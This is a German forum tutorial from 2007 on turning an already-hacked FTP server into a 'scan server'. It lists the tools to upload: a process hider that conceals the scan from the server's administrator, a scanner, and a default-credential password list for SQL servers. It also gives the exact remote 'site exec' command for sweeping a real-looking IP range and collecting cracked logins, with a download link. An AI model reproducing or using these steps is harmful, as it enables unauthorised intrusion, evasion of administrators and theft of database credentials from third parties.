[FTP] Scanstro erstellen

Dieses Thema im Forum "Filesharing Tutorials" wurde erstellt von $STAATSANWALT$, 18. August 2007 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. $STAATSANWALT$
    $STAATSANWALT$ Neu
    Stammnutzer
    #1 18. August 2007
    Scanstro erstellen

    So Leute, dann möchte ich euch mal das Erstellen eines Scanstros zeigen, was eigetnlich ziemlich leicht ist. Es gibt viele Methoden, des is meine ^^
    Also als erstes benötigt ihr natürlich euren gehackten Stro, das is ja klar ^^
    Dann ladet ihr folgende Datein rauf ( auf den Inhalt komme ich später )
    -------------------------------------------------------
    Code:
    hidden32.exe
    scan.exe
    passlist.txt
    -------------------------------------------------------
    So nun zum Inhalt dieser Datein.
    hidden32.exe bringt letztendlich, dass dem Admin die Scanaktivität in seinem Taskmanager nicht angezegit wird. hide = verstecken.
    scan.exe ist der eigentliche Scanner, der halt, wie der Name sagt, nach den Servern scannt.
    passlist.txt In der passlist.txt stehen standardlogins wie z.B. sa/sa etc pp. die der Scanner abarbeitet.
    hier seht ihr die Logins die er verarbeitet ( eigene können hinzugefügt werden )
    Code:
    sa
    admin
    sqladmin
    administrator
    password
    manager
    data
    system
    database
    sql
    emx
    sqlserver
    server
    root
    test
    test1
    test2
    test3
    test123
    1
    12
    123
    1234
    12345
    123456
    1111
    1123
    4430
    6911
    1212
    1499
    6230
    1921
    6111
    4430
    2421
    -------------------------------------------------------
    Starten des Scanprozesses.
    Zunächst mal den Befehl "erklären".
    Code:
    site exec hidden32.exe scan.exe 130.108.0.0-130.108.255.255 -p passlist.txt -o output.txt 
    site exec sagt dem Server das er etwas auszuführen hat, was in diesem fall hidden32.exe und scan.exe sind. Die IP dahinter bedeutet, dass scan.exe nach den folgenden IPs scannt. -p passlist heißt, dass der scanner dabei die folgenden passes abarbeitet und -o output bedeutet, dass die gefundenen Logins in einer output.txt gespeichert werden, die ihr euch dann ziehen könnt.
    Wenn ihr den Befehl ausführen möchtet connectet mit euren FlashFXP auf euren Stro und drückt die Rechte Maustaste und dann auf "Commands" => "Raw Command". Wenn der Befehl erfolgreich war erhaltet ihr folgende Meldung:
    Code:
    [R] 200 EXEC command successful (TID=33).
    -------------------------------------------------------
    Ich hoffe, dass das ganze recht verständlich war...
    Dann wünsch ich euch viel Erfolg.


    Und hier gibts jetzt die Programme:
    [BLINK]Download[/BLINK]
     

  2. Anzeige

  3. Videos zum Thema